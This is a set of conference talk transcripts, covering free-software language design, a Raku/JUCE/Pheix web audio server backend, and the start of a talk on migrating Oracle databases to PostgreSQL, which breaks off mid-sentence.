sort of the way the language fits your brain the best. If a language is less expressive and sort of forces you into a particular style, then you don't have that option. And so I think that that is one of the ways an ideal free-software language can leverage that expressivity: when you're not trying to make a language that can fit into the sort of huge-team environment, you can make it so expressive that people can find their preferred way of constructing signatures, or their preferred subject-verb order, or whatever it is that fits their brain. Yeah, so that's what I have to say about that. Thank you very much. Now, in your talk you were talking about the difference between a larger team and a smaller team. What about people who are working by themselves in a community? How does that relate? So, I mean, I think I would describe someone who's working... let me ask a clarifying question. 
Do you mean working by themselves in a community? Do you mean someone who's working by themselves but accepting contributions from other people in a community, or building a tool that will be used by other people in the community? What do you mean by "in a community"? Yeah, so someone who's working by themselves but maybe contributing to a community piece of software, rather than being on a small team or a larger team. Okay, yeah. So I think to some extent it depends on the size of the team working on the software as a whole. So even if many of the people who are contributing code to the Rakudo compiler are working by themselves physically, I would describe that as a larger-team project, because it does have a number of different people and you need to have a cohesive style. But when you have something like Impress, which I talked about in the presentation, where it is collaborative in the sense that it is out there for everyone to use and accepts pull requests, but the majority of the code is done by just one or two or three or four people, I would describe that as a small-team project. Right. Thank you very much. There was another comment about Racket. Are you familiar with Racket, and does it maybe have a similar approach? I think it does. I presented a dichotomy in this talk between languages that come out of big tech and the sort of ideal programming language for free software, and that is an important dichotomy. There's a third category that I skipped in the interest of time, and that is languages that come out of academia. And I would put Racket in that category, which I think has a lot of overlap with languages that are good for free software, but some subtle differences. And I really like Racket, but I think that it is not as much an ideal free-software language, for different reasons that I don't have a huge amount of space to go into here. That would probably be another interesting talk: contrasting the ideal academic language with the ideal free-software language. But I would put Racket more on the academic side of the spectrum, although it does do a good job of hitting many of the values that I think are important for a free-software language. Okay. Thank you very much. So, considering that Raku and Perl don't have corporate ownership, what are the biggest downsides? Where the languages you've talked about have downsides, maybe, from being written to solve Google's problems, what are the downsides of not having that corporate, big-tech leadership and direction? Well, I mean, I think it really comes down to resources. Larry Wall, when talking about the effort to write what became Raku, said: the old saying is you've got to do it cheap, fast, good, pick two, and in free software we knew we had to do it cheap because we didn't have the resources to throw at it. So then we were really left with just picking one between good and fast, and I think anyone who followed the story of Perl 6 development and then Raku development knows that they picked good over fast, in terms of not the speed of the program but the speed of delivering the language, and I think that was a good point.
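To make the signature point from that Q&A a bit more concrete, here is a minimal Raku sketch (not taken from the talk) showing a few of the styles a project could settle on for the same behaviour; the routine names and bodies are hypothetical, chosen purely for illustration.

```raku
# Minimal Raku sketch (not from the talk): the same idea expressed in
# several signature styles, so a project can pick its own house style.

# Positional parameters with type constraints
sub greet(Str $name, Int $times = 1) {
    say "Hello, $name!" for ^$times;
}

# Named parameters, for call-site readability
sub greet-named(Str :$name!, Int :$times = 1) {
    say "Hello, $name!" for ^$times;
}

# Multi dispatch, letting the signatures themselves do the branching
multi salute(Str $name)             { say "Hello, $name!" }
multi salute(Str $name, Int $times) { salute($name) for ^$times }

greet('Alice', 2);          # positional style
greet-named(:name<Bob>);    # named style
salute('Carol', 3);         # multi-dispatch style
```

All three produce the same kind of output; which one reads best is exactly the sort of house-style decision the answer above describes.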
Many programming languages have been explicitly designed to solve the problems of "programming in the large" – that is, to make it easier for large groups of software developers to work together, despite differences in skill, experience, or history with the project. Languages following this pattern are an excellent fit for the sort of large software companies that typically sponsor their development. However, they are not necessarily a good fit for typical free/open-source software projects, which face different challenges and constraints. If a language were designed from the ground up to fit the free-software usecase, what would it look like? What values would it maximize, what tradeoffs would it be willing to make, and what would it be like to program in every day?
10.5446/53257 (DOI)
Hello friends, my name is Konstantin, I am from Moscow, Russia, and today I will give a talk about web audio services development. Actually, this is mostly about creating, configuring and deploying web audio service software with Raku. But at the beginning of this talk I would like to introduce myself and say a few words about me. My general interests are related to real-time programming, embedded systems, low-level programming like drivers, real-time operating systems, components and so on. I'm working on critical software verification, test automation and modeling. On the other hand, I am an Ethereum enthusiast, not really a cryptocurrency holder, but a blockchain technology researcher and developer. For over five years I have had experience with different Ethereum-related features: decentralized projects, different applications, smart contracts, node and network setup, and deployment as well. Also, I have been involved in the Raku ecosystem: I'm a maintainer and contributor of a few Raku modules like Router::Right, Elsevier, Revoluted, Net::Ethereum, and Pheix. Previously I've taken part in a few Perl workshops and conferences, so maybe you know me, maybe we have met somewhere. So that's okay, the summary is over, and I think we should start with my presentation. I will share my screen. Okay, it's the first slide, the title. The talk topic is programming a digital audio server backend with Raku, so actually it's about how to build a web audio service with Raku as the main programming language. Let's start. In the beginning, I would like to share my subjective opinion about what web audio services are now. The COVID-19 reality has given them a new life, I think. When we have such things as self-isolation, social distancing and lockdowns, people prefer to stay at home, and that's good. We should keep in mind that if they were involved in a creative process before the pandemic, now they are online and want to continue working from home, to continue their usual recording sessions, for example rehearsals, from their laptops, tablets and phones. In this reality, there is big interest in online services for creativity, especially services for musicians, producers, actors and other creative people. Creative audio services work on a server or in the cloud and provide a set of tools like artificial-intelligence composers, stylistic classifiers, plagiarism scanners and content reviewers. The core features are sound processing or synthesizing on the server and client side. Today, we have more or less rich support for clients, I mean on the client side in the browsers: the Web Audio API technology and modern JavaScript libraries like Atom.js and Wave.js. So what to choose: process sound on the client, or process sound on the server side? To resolve this question, we should consider the cases. Processing on the client is good if your web service works on a single peer-to-peer connection model. Of course, you can have many clients online, but we suppose that all of them are independent and do not communicate with each other; in this case, all audio processing should be performed in the browser. But server-side processing is good for the next cases. For example, you have proprietary algorithms which you don't want to share with anyone. The next case: you have a many-to-many client communication model, for example you need to mix audio streams from a few clients and work with them as one common resource.
In this case, you need a central server that will perform these procedures. And the third case is when you have specific devices attached to a server: digital signal processors, or hardware solvers for a specific algorithm, for example an impulse-response solver or a transfer-function solver or something like that. Also, you should keep in mind that client-side processing is good for decentralized tasks, and the server side is perfect for cases with centralized control, cases where you need a central server. Okay, in this talk we are considering server-side processing, so we should know what the specifics are on the server side. First and most basic: the main operating system on a server is Linux, and if you have experience with audio processing and audio programming, you know Linux is one of the least supported platforms. The next thing to keep in mind is that there is no graphical interface on a server: we have no dialogs, windows, widgets and so on. And the last valuable thing is that we have only TCP transport on the server; we have to pass all traffic through HTTP and HTTPS. That's what we should keep in mind. But the good part is that a server for audio processing is much more flexible. As I have said, on the client we use browser features or JavaScript libraries based on those features, but on the server side we could use anything: native libraries, the platform itself, driver calls to the server devices. On the server we actually have many more possibilities for our requirements. So here I will introduce a new term: the headless audio backend, the generic server-side software. I also want to draw your attention to the fact that we can combine server-side and client-side processing; this is a very productive approach, we do something on the client and something on the server, and we will consider these cases in this talk. Okay, what actually is a headless audio backend? It has at least two main, generic layers. The first is the client service; not a service like a Linux or Windows service, but some kind of software that serves the clients. And the next thing is the audio engine. As I said, the client service is something like the front line of the backend: it speaks with browsers and performs the full stack of client management, authorization, configuration, streaming and whatever. And the audio engine is the hard-core server-side software and performs all the digital signal processing features. It can be implemented as an active or passive service, and we will consider these cases below. The next term is the ABC schema. On the previous slide, we spoke about two components, the client service and the audio engine, but now we consider a more complicated view of the headless backend and add a new entity: the balancer. This software entity sits between the audio engine and the client service, and its main goal is to reduce the load on the audio engine. In some cases, we do not need a balancer, for example in simple services where there is only one audio engine. But if you have a cloud processing service, for example a network of audio engines, we have to use a balancer, and in this case the balancer will manage the tasks inside our network and distribute them over the audio engines. What actually is the audio engine?
I will consider the passive audio engine as a shared library in this talk. This shared library will have a set of audio processing features like a fast Fourier transform algorithm and an inverse fast Fourier transform algorithm, a resample function, a normalize function, a transfer function, a spectrum creator and various others. If there are specific devices connected to our server, the audio engine should have a layer with driver calls or inline assembly. I should also mention that audio engines are traditionally written in high-performance languages like C and C++. What is the balancer? Let's consider typical cases for the balancer, starting with the cases. First case: we have a single audio engine. In this case, we don't need the balancer; we only have some profit if we have a multi-core platform, because the balancer can execute runners in parallel processes and on independent CPU cores, so here we have a little profit. The next case: we have a few audio engines on independent servers or in independent virtual environments. The balancer should manage the tasks over the servers and run them on different cores if possible; this is the basic use of the balancer. The third case is when we have special hardware attached to our server for specific tasks. Here the balancer should understand which tasks can be processed on this device, communicate with the device and push the tasks onto it. For example, if we have a hardware solver for the Fourier transform, the balancer understands that a task has a Fourier transform inside and should be solved on the hardware device, so it runs a stack of driver calls, pushes the task to the device and fetches the results. This is the main functionality of the balancer. All of these cases suppose a balancer with the functionality of a task manager, which should implement specific policies: scheduling, task fetching and cancellation. And what about the client service, or client controller? Actually, I propose a regular content management system there. It should allow non-technical users to communicate with the audio engine features, and the specific features of content management systems are: first of all, it should have two layers, a presentation layer and an administration layer, because of course one area of our web service is private and the other should be public. The CMS should support templating; it should be scalable or expandable, and in this presentation we will show how that really works and how we can add new features to our CMS via modules or addons. It should have rich editing tools, so we don't need to mark up or write raw HTML; all we have are what-you-see-is-what-you-get editing tools, very similar to Word or other high-level text editing instruments. And of course, our CMS should manage workflow, I mean access levels, roles, content storage management and similar things. Okay, here is one more iteration of the terms. Previously we spoke about ABC, I mean the audio engine, balancer and controller schema, and now we should define JRP. What is JRP? ABC maps to JRP, because when we consider the ABC model we are talking about backend software components, but JRP defines the software itself, the software complex of programming tools, libraries and frameworks. So the JRP audio processing backend is defined as, firstly, the JUCE framework: a fast, well-documented, user-friendly audio processing framework written in C++ and C. The next thing is Raku. This is a quote from the Raku website.
Raku is a feature-rich programming language made for at least the next 100 years. And the third thing is Pheix. Pheix is a content management system with data storage on the Ethereum blockchain, written in Raku. Okay, let's answer the question: why should we use JUCE? Basically, JUCE has a lot of components and tools related to audio processing. Also, the plus of JUCE is that it's all-in-one: if you're using this framework in your application, you get everything you need to build it, and not only things related to digital signal processing; there are a lot of helpful classes and components like JSON, cryptography, OpenGL, graphical user interfaces and other handy things. Also, we can create a console application with JUCE, or a shared library as well. That's very important in relation to this talk, because we use a passive web service based on a shared library. But the bad part is that JUCE has license restrictions: if you use the framework for commercial purposes, you have to pay the JUCE guys. So keep this in mind when you are creating the roadmap of your startup or starting the development of some web service. The next question: why Raku? The answer: it's made for at least the next 100 years. But seriously, Raku has a very intuitive, clear NativeCall layer for integration with third-party libraries or applications. I have experience with SWIG, a nice adapter for Perl 5, and with JNI, the Java Native Interface, which also supports calling libraries in other languages from Java, and my opinion is that Raku has one of the simplest implementations. The C language is quite nicely supported by Raku NativeCall, while C++ is marked as experimental and not well tested or developed. But we use it: we use Raku as an adapter for C++ libraries, and there is a great how-to by Andrew Shitov with an explanation of how to use NativeCall with a C++ library; the link is provided on the slide and you can browse it later to see what happens there. Okay, why Pheix? As I like to say, Pheix is the first CMS in the world with data storage on a blockchain and written in Raku. Yeah, that's true, and this is why it should be used in audio web services: in this industry copyright questions are very important, and blockchain technology provides a mechanism to store data and to guarantee that the data is kept unchanged, uncorrupted and validated. A simple example: a band is recording a track online, and during one of the recording sessions someone from the band proposes a musical phrase or riff. We can store this event as metadata on the blockchain, and in the future it could be used to prove authorship rights or to resolve disputes about it. Also, Pheix is now at the beta release, announced on 25th January. And to the basic question of why Pheix, I answer: why not? Let's stop on the integration point. In the JRP concept, Raku is the glue for the audio server backend components. We can also consider this language as a tool for creating high-level adapters for the JUCE audio engine, and I'm interested in adapters in this case. The front server backend component is Pheix, I mean the client service, and the audio engine adapter connects to Pheix as an addon or external module. Pheix addons or modules should be implemented according to specific guidelines. Addons are regular Raku modules, simple Raku modules, but they should be set up in the Pheix global configuration file; I will speak about this later.
If we need to integrate some audio engine features into our backend, we just write a new module covering the required audio engine API, install it, and the service should work. Now we are starting with the practice session. As I mentioned above, our web audio service is passive: we have no persistent workers or any active entities, and we use a shared library. The basic approach is to call a single library API per request. But if we need to batch or loop our API calls, we should either extend our library with an accumulator function which performs the additional logic, I mean the loop or batch, or do the loop or batch in the Pheix adapter module, I mean inside the Raku module, or in the browser as a chain of client requests. What to choose? It depends on the case, but it usually comes down to your server performance, the bandwidth and the current web service load, and maybe there are cases where you should combine these methods, I mean a chain of requests and an accumulator function on the backend; it should be possible, I think it's realistic. Okay, once more: we use JUCE as a shared library. JUCE has its own project manager, the Projucer, which can create projects of different types, for example a standalone application, an audio plugin, a console application, a library and whatever. For JUCE 4, which is quite an old version, there is unfortunately no option to create shared libraries, so in that case we need to create a console application and patch its makefile. I'm presenting the link to the repository where this work is done, so if you use older JUCE framework versions, I think you need to check this link. But the better way is of course to use the latest version. In JUCE 6, the current version, there is a feature to create a shared library, and there is a build option for this, so all you need is to implement your API and run the build. Here is the Projucer window; we see the screenshot where we are creating a new project. You just select dynamic library (it's selected on this screenshot), create the library and go on. Now we will consider an example of a simple shared library. I will show how to create a simple demo library and perform its API call from Raku. For this case, I will create a simple library with only one API call. The source code is on the slide: we have a just_shared call that returns no value, has no inputs, and prints the current JUCE framework version, taken from the JUCE headers. So all we need is to create a dynamic library project, create one source file with this code and patch the makefile, because by default JUCE hides the user APIs: you see on the slide we have a visibility hidden flag, set by default. I just removed this flag from the makefile manually, but you could comment it out or apply some settings inside the Projucer. Next we have to run make, and voila, our shared library is cooked. Also simple. And what about Raku NativeCall? As I mentioned above, we have a great article by Andrew Shitov on how to call C, C++ and Fortran from Raku, and on this slide I will give a quick explanation; for more details you should follow the link to the original article. In the case of C++, we have to get the correct symbol name of our function from the shared library's symbol table. We use the nm command-line utility with grep in a pipeline; the command line is given on the slide with a pink background, you should see it. It will output a line with the address and the mangled name.
Looking at the slide, we see the address, a T character, and the mangled name. Let's see what the mangled name is: an underscore and a Z start the mangled symbol, then comes the namespace part, then 11 is the length of the function name; yes, really, just_shared has 11 characters. And v is a postfix which shows that we have void in place of the parameters; in other words, the function has no parameters. Okay, what does the Raku test script for this look like? This is the mangled symbol name that we considered on the previous slide, and we should use that name in our Raku code. I have a simple Raku script (the name is on the pink background on the slide), and it has trivial code. First we declare use NativeCall. Next we define a subroutine named just_shared. It has the is native trait, to which we give the path to our shared library, and also an is symbol trait with the mangled name fetched from the library's symbol table, as shown on the previous slide. And the third thing: we just call the Raku subroutine. It will work, and our script will output the version of the JUCE framework. Let's check. We see "I am a JUCE 5.4.5 shared library", and this is exactly what we coded in our C++ source. Very trivial. But of course there are a few tricks, and all of them are related to return values and function arguments. Let's see. In this talk I have spoken a few times about web audio services, and here we are speaking about the frequency analyzer (in some places I call it by different names). This web service provides the following basic functions. The first one is resampling: we need to resample from different sample rates to the reference one. Next, we need to draw the spectrogram. We also need to mix audio channels, do Fourier transforms, analyze the data after the transform, and save the analysis data in JSON. On this slide, every feature has a link to the original JUCE documentation, so you can check which component and which class is used for each feature. I also provide the link to the Matlab model, so you can check what analysis I do inside my frequency visualizer. If you are familiar with Matlab or Octave, check the link: there is an M-script that can easily be run in Matlab, and you can understand it, debug it, whatever. And here is the web view of the frequency visualizer web service; it works directly in the browser. What steps does the user perform to see this window? First of all, we upload the audio file. After a successful upload, the processing handler is run and the results are available online. Here you see two types of spectrograms, one with the more granular frequency and power visualization, the red one. You also see the plot with frequency curves; it's the output of a specific processing algorithm. As you see, there are many correlations between the plot and the waveform, and that is some kind of proof that the algorithm works fine and the data is genuine, no fakes here. Let's speak about the Raku adapter module. It has two basic requirements: first, it should be installable via the zef package manager, and second, it should of course cover all the audio engine APIs. The current APIs are presented on the slide and we'll go through them; they are implemented exactly as shown above, I mean with NativeCall, but we should keep an eye on the pointer types of return values and arguments.
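Before going through those calls, here is a minimal sketch of the basic binding pattern from the demo library a moment ago. The library path and the mangled symbol below are placeholders standing in for the real values shown on the slide, so treat this as an illustration rather than the exact code from the talk.

    use NativeCall;

    # Placeholders: take the real path and mangled name from `nm -D <lib> | grep shared`.
    sub just_shared() is native('/opt/freqviz/libjuceshared.so')
                      is symbol('_ZN6sample11just_sharedEv')
                      { * }

    just_shared();   # prints something like "I am a JUCE 5.4.5 shared library"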
Okay, we need to save the spectrogram, as I said. The save-spectrogram API call is the simplest one: it has a single argument, the file name, with a string type, and it returns an integer used as a boolean: did the spectrogram get processed and saved, or do we have an error. We also need to resample, so we have the resampling API call: if we get a file with a higher or lower sample rate, we need to normalize it. It's more complicated: we have two arguments, an integer sample rate and a pointer to the buffer to resample, and we get a reference to a buffer as the return value. Do mixing: we need to mix the left and right channels. We don't analyze the channels separately, but with mixing we keep the channel-specific frequencies and don't lose any specific data. This call is similar to resampling, but it has a single argument, a reference to the buffer to mix, and returns a reference to the mixed buffer. Do FFT: it's a plain fast Fourier transform; again we have a buffer as the input argument and a reference to a buffer as the return value. The last call is do analysis: it also takes a single argument, a pointer to the FFT-transformed buffer, and returns a pointer to a string with the analysis results in JSON. Okay, let's speak about integration. I should say a few words about how Pheix works with addons. First, addons are regular Raku modules, that's one point; second, addons have strict development guidelines. Pheix is based on a hybrid CMS concept. What is this? On the one hand, we have the legacy CMS approach for page template output, but on the other hand we use a REST API for page content rendering: when we generate the main page from the template, in the place of the content we have a JavaScript call to the backend, which retrieves the content from our CMS, and this is the headless CMS case. This should be followed during module implementation and development, because some module methods are CMS-independent and others are used by the CMS. Sample addon source code is presented at the links, you can inspect it, and more information about addon and module development for Pheix can be found on our wiki pages; please check them out. What is the module configuration? The basic config supposes routes: we need to set up at least three routes, the first for the file upload form, the second for the uploaded files list, and the third for the file details; this last one is actually the frequency page we considered a few slides before, with the spectrogram and plots. As mentioned, we use the Router::Right module as the primary router; it has good performance and provides powerful tools for routing annotations, so check the module for details, the link is attached to this slide. We store the routes in JSON: as I said, routes are configurable, and we store them in a JSON configuration. Here is a sample one with the three routes we discussed on the previous slide. Every route has a URL path, very much like a regular URL, and handlers. The default handler for each route is for the entire page, and the API handler is the handler for the content. As I said before, we fetch the content with an additional API call: the default handler renders the page from the template with JS code that performs a REST API request for the content, and this request is processed by the API route and API handler. Let's say a few words about the module structure. This slide is just a summary, but it shows the details of our module: private methods relate to the JUCE audio engine, and public methods relate to Pheix.
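Going back to those five engine calls, here is a hedged sketch of how their NativeCall declarations might look in the adapter module. The function names, the library path and the exact C-level types are my guesses based on the slide descriptions, and a C++ build would additionally need an is symbol trait with the mangled name on each sub.

    use NativeCall;

    constant LIB = '/opt/freqviz/libaudioengine.so';   # placeholder path

    # Guessed signatures; for C++ symbols add `is symbol('<mangled name>')` to every sub.
    sub do_spectrogram(Str $file)                returns int32   is native(LIB) { * }
    sub do_resampling(int32 $rate, Pointer $buf) returns Pointer is native(LIB) { * }
    sub do_mixing(Pointer $buf)                  returns Pointer is native(LIB) { * }
    sub do_fft(Pointer $buf)                     returns Pointer is native(LIB) { * }
    sub do_analysis(Pointer $buf)                returns Str     is native(LIB) { * }

    # A typical chain for one uploaded file might then be:
    #   my $json = do_analysis( do_fft( do_mixing( do_resampling(44_100, $buffer) ) ) );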
Also, as we have said, we should cover all the JUCE audio backend APIs, and we should follow the guidelines mentioned above during module development. When our module is implemented and installed with zef, it's available for use from Pheix, but we need to tell Pheix to pick it up. That's done through the generic configuration file: all we need is to add a new key and value to the installed section, to the installed collection. As you see, we have the frequency-visualizer key, and the addon class name as the value for this key. Here is what the public methods should look like. Default route methods have two arguments, tick and match. Tick is a counter of FCGI calls (we use FastCGI as the primary technology within Pheix), and match contains the route-matching details; for example, you fetch IDs or page names from this structure, which is a simple hash in terms of Raku types. API route methods have more arguments: tick and match plus a few others. About the others: the route path is a simple string, very similar to a URL, and the shared-object argument contains references to Pheix's internal helper objects. I should say Pheix has many helper objects that are available to the user, I mean to the caller modules: for example a JSON helper object, an FCGI helper object, and also a blockchain helper object. So please check our wiki pages to understand which shared objects you can use inside your module. And I should say it works, yes: the live frequency visualizer is available now. This slide has all the related links, please check them out. The first one is the frequency analyzer service deployed on the Neoruix site. The second link is the analysis algorithms, stored in a separate repo: you will find the Matlab/Octave model there and some tickets on algorithm validation and proposals. The third link is the JUCE workaround repository, actually a group of repositories; for example we considered the one where we patch makefiles for older JUCE versions to create a shared library from a console application, so check it out. And the last link is very interesting: it's the Pheix addon integration thread. There are a few tricky questions mentioned there, and if you're interested in how to implement modules for Pheix, you should definitely check it out. Okay, we're almost at the end, so let's speak about the perspectives of this project. In 2019, I was at the Audio Developer Conference, and there was a great workshop about writing an application with a JUCE backend and a JavaScript frontend. The idea was to use a headless JUCE backend application and a JavaScript graphical user interface written with React and Electron, as a separate web application. In that case, the JUCE backend has no GUI but performs the sound processing and sound playing. It's interesting because the GUI in this setup is platform-independent: it's the same on iOS, Android, Windows and other systems, while, as you know, a native graphical user interface can differ from one operating system or one browser to another. So my goal is to take the example considered during this workshop and put Pheix in the middle. And the other interesting and very tricky thing is to have JUCE not play the sound but stream it to the client, to the browser.
So it takes the stream from the JUCE audio engine and passes it, proxies it, to the browser. Another feature that is interesting to me is to save all events, events like commands from the remote GUI, or hashes from the audio stream, I mean pauses and other things that we could use as breakpoints on the stream, maybe some timestamps from the stream, to the blockchain. It would be very interesting to use blockchain technology as an additional logger for our JUCE backend runs. This is work in progress; I think I will have new results this summer, and I very much hope to be at the Audio Developer Conference this year with a talk about this web service. Well, I should make a call to action: yes, I want to invite you all into the JUCE, Raku and Pheix development process. Here are the links, and of course forks and code reviews are very welcome. If you like any ideas or concepts from this talk, let's get in touch, and of course you could help me keep this work going with donations; this panel on the slide is exactly about that, so if you can, please donate. So that's the end. I would like to thank the Perl and Raku devroom organizers; I say hello to JJ and Stuart. I'm proud to give this talk and I'm happy to be part of FOSDEM 21. Thank you, thank you for your attention. Please go on if you have any questions.
Musicians, producers and composers use digital audio workstations (DAWs) in their daily work. You've probably seen beautiful photos from recording studios: a sound engineer sitting in front of several monitors full of multi-track recording application windows and dialogs. This is the DAW. But what about running a DAS (Digital Audio Server): a server instance with the benefits of a DAW plus multi-client access from the web, compatibility with popular cloud services, and a FOSS, Raku-driven backend? In this lecture we will consider the DAS backend as a JRP pipeline — JUCE + RAKU + PHEIX, focus on each component and demonstrate Raku as a tool for unusual daily programming tasks. When we talk about sound processing on a remote server or in the cloud, we mean a set of various web audio services: AI composers, recognizers (stylistic classifiers, plagiarism scanners, audio content reviewers), co-creativity tools, etc. Each of these services is based on a headless audio processing and mixing backend. This is actually a Digital Audio Server (similar to a DAW), providing multitrack recording, mixing and processing in real time via an API. The fundamental differences between a DAS and a DAW are: the Linux platform, no GUI, and the TCP/IP stack as the only data transport. In this paradigm we can define DAS software as Linux + headless audio backend. The frontend provides visualization of the processes on the backend, works in the context of a web browser on the client workstation and interacts with the backend via, for example, a REST API.
10.5446/53263 (DOI)
Hello and good day. I'm going to tell you what to watch out for when you want to migrate Oracle databases to Postgres. First, a little bit about me and my company. I'm Laurenz Albe. I am a contributor to Postgres and have worked with Postgres since 2006. I maintain the Oracle foreign data wrapper, which hopefully gives me some credibility in the field. I do support, training, consulting and development for Postgres for the company CYBERTEC, where I've been working since 2017. Yes, my company CYBERTEC does exactly the things I said before: everything for Postgres. But not only that, we also have a data science branch, so if you have anything with big data, we can also help you. We are all over the world, and so are our customers, and I think that's enough; you know where to find us if you want this. I'm going to talk to you about these things. First of all, I'm going to talk about the individual steps when migrating an Oracle database to Postgres, the difficulties you can encounter there and how to overcome them. After that, I'll tell you a little bit about tools for migrating from Oracle. Yes, but first the steps. In this slide, all these steps are presented in the same size, which might suggest that they are equally difficult, but that is not the case. The next slide shows the steps in what I think is a more realistic size. So what people often think is the most difficult thing, migrating the data, is actually technically not the biggest challenge. Usually the problems come with migrating stored code, that's what I call stored procedures, functions, packages, triggers, everything that's written in PL/SQL or Java in the case of Oracle, and with migrating the SQL code. So let's look at these steps in turn. First, something general about open source and Postgres. I don't want to go into these in detail. These are typical questions that people come up with if they have never experienced open source or are very familiar with closed-source databases like Oracle. You've probably heard them. Actually, they do not concern us so much when we get to the step where we actually want to migrate an Oracle database, because by that time those questions are typically settled. But be aware that before that, you'll have to face them. Now, some general differences between Oracle and Postgres that may hit you. First, something about transactions. On the surface, it looks pretty similar: both databases use multi-versioning, and concurrency and locking look pretty much the same; not totally, but usually it's not a big problem there. Under the hood, however, Postgres and Oracle manage multi-versioning quite differently. There are some advantages on the Postgres side, for example no problem with running out of undo tablespace, no "snapshot too old", and rollback is instantaneous. But there are also downsides that might hurt you. In Postgres, a workload with many updates is difficult because it generates a lot of dead tuples. Workloads like that require autovacuum tuning, and you may even have to do more: reduce the fillfactor and maybe drop some indexes so that you can get HOT updates, to survive a heavy update workload. Another thing you have to watch out for is that table sizes will grow when you migrate to Postgres; that's because of the different multi-versioning implementation, which requires tuple headers for visibility. And finally, in Oracle there's something called statement-level rollback.
If you have a statement inside a transaction and that statement fails and causes an error, only that one statement is rolled back, but the transaction continues. In Postgres, however, a statement that fails in a transaction aborts the whole transaction. So that's something that can hit you. You can work around that with savepoints, but don't be too generous with them; they have their own problems. You can deal with that problem, but you have to think about it. A little bit about synonyms, because Oracle has a pretty reduced metadata model: there's only one schema per user, and you can only access tables without schema qualification if they're in your own schema. So they invented the concept of synonyms, which are basically aliases to tables or other objects in other schemas. We typically don't need that in Postgres, because we can just set search_path appropriately and the problem is gone; for any advanced uses of synonyms, a view typically does just as well. Views also have some differences. In Oracle, you can drop a table that is used to define a view; the view then becomes invalid, and trying to use it will cause an error. Postgres is more strict: it does not allow you to drop the table in that case. So you will have to change your schema upgrade procedures: first drop the view, then modify the table, and then create the view again. Nothing impossible, but a change in procedure. Then materialized views. The support for those in Oracle is much more sophisticated: you can have materialized views that are updated whenever something changes in the underlying tables, and so on. You don't have any of that in Postgres, so if you need something like that, you'll have to do it yourself, perhaps with triggers that modify a table automatically. Tablespaces are no problem; the only thing to keep in mind is: don't use them in Postgres and you're good. Migrating the database schema: the big problem here is mostly data types. It's not a problem as such, but it's something where you have to think. The point is that there are more types in Postgres than in Oracle, so typically there's more than one choice on the Postgres side, and it can make a difference. With date, for example: dates in Oracle have an hour, minute and second component, so you have to decide, do I want to migrate it to date and ignore those, or do I want to migrate to timestamp? These decisions cannot be made automatically, so you have to make them by hand. Similar with number: everything in Oracle is number, but should it be integer, bigint, double precision or numeric in Postgres? Also keep in mind that you need the same data type in Postgres for both columns if you want a foreign key constraint between them. In Oracle, you can have a number(5) column with a foreign key reference to a number column; in that case, make sure you translate both columns to the same data type. And finally, large objects, LOBs. That's pretty easy: there is the potential choice between bytea and large objects in Postgres, but you should always use bytea.
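To make those by-hand decisions a bit more concrete, here is a hedged sketch of the kind of mapping table a home-grown migration script might start from; the choices below are only illustrative defaults, not recommendations from the talk.

    # Illustrative Oracle -> PostgreSQL type choices; review every column by hand.
    my %type-map =
        'NUMBER(5)'     => 'integer',
        'NUMBER(19)'    => 'bigint',
        'NUMBER'        => 'numeric',        # or double precision, if you can live with rounding
        'DATE'          => 'timestamp(0)',   # Oracle DATE carries hours, minutes and seconds
        'VARCHAR2(100)' => 'varchar(100)',
        'CLOB'          => 'text',
        'BLOB'          => 'bytea';          # prefer bytea over large objects

    # Both ends of a foreign key must end up with the same PostgreSQL type.
    say %type-map<DATE>;    # timestamp(0)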
Now, the migration of the data. This is technically not as complicated as most people think; the big challenge is more that this is the part of the migration that takes the longest time, so it determines the downtime, which is often critical. If you just dump and restore, then yes, you will potentially have a long downtime. You can reduce the time by parallelizing: migrating different tables in parallel, creating indexes in parallel, and so on. For more advanced users, you want something like replication between Oracle and Postgres, so-called change data capture: you start moving the data over and at the same time record all the changes on the Oracle database, to be able to replay them later on Postgres. Once replication has caught up, you can switch over with little downtime. This is nice, but it's difficult, and typically you only get it with commercial tools. Problems with migrating the data: first and foremost are corrupted strings. These are more frequent than you might think, because if client and server encoding in Oracle are the same, you can stuff any garbage into Oracle databases, and this happens. Postgres is less forgiving about this, and you will get error messages about invalid byte sequences. Those have to be fixed on the source side. The second thing are zero bytes: in Oracle strings you can have ASCII NUL, ASCII zero bytes, which are not allowed in Postgres. Again, either fix them on the source or, and in this case it's typically pretty easy, strip them away during migration; nobody really wants those. And finally, there are infinite numbers in Oracle, represented with a tilde. If you migrate to double precision, that's easy, there's an infinity value there, but with other numeric data types there is no such value and you'll have to think about it.
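As a hedged illustration of that kind of clean-up, stripping zero bytes and flagging Oracle's infinity marker in a small Raku transfer script could look roughly like this; the tilde check and the error handling are assumptions for the example, not a complete recipe.

    # Clean one text value fetched from Oracle before inserting it into PostgreSQL.
    sub clean-value(Str $value) {
        # Strip ASCII NUL bytes, which PostgreSQL rejects inside text values.
        my $cleaned = $value.subst("\0", '', :g);

        # Oracle shows infinite numbers as a tilde; force an explicit decision instead of importing it.
        die "infinite value needs a manual decision" if $cleaned eq '~';

        return $cleaned;
    }

    say clean-value("fix\0me");   # fixme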
Stored procedures. This is the most difficult, or at least the most time-consuming, part in my experience. It should be simple, because PL/pgSQL, after all, is very similar to PL/SQL, but it is different. A simple example is RETURNS versus RETURN in function definitions. That one is pretty straightforward, and there are tools that provide automatic translation, but they are never perfect, and with more advanced problems there will always be something that you have to do by hand. Trust me, it's never all automatic. Some frequently encountered examples: transaction management in functions is possible in Oracle, but not in Postgres. There's some limited support for transaction management in procedures in Postgres from version 11 on, but that support is really limited and often won't do. If it's just a batched delete, which people in Oracle like to do because they don't want to run out of undo tablespace, you can simply get rid of it, because it doesn't matter how big a transaction is in Postgres. But in other cases, you'll have to move the logic to the application. There are also autonomous transactions in Oracle: they are independent of the surrounding transaction and can be pretty useful to, for example, add an entry to a log table but roll back the surrounding transaction. You cannot do that in Postgres. If you don't want to move it to the application, there is the workaround of using the dblink extension to create a database link from the database to itself and have a second transaction that way. And finally, there is BULK COLLECT in Oracle, a performance improvement to fetch several rows from a cursor in one call. There is no good equivalent in Postgres, so typically you just simplify it and process the cursor row by row. Packages are their own problem. That's modular code in Oracle: they contain variables, type definitions, functions and so on. We don't have that in Postgres, which is not so nice. One thing you could do is use a closed-source fork like EDB's, since they support packages to some extent. There's sometimes a workaround that can help: just create schemas with the same names as the packages, and the functions from each package become functions in that schema. Then the call syntax stays the same, and it can often be a drop-in replacement. Of course, that won't cover everything, like global variables and so on. Also, Oracle comes with a large library for use in PL/SQL; you can do anything, send emails, send HTTP requests from stored procedures. We don't have that. Either move the code to the application or re-implement it 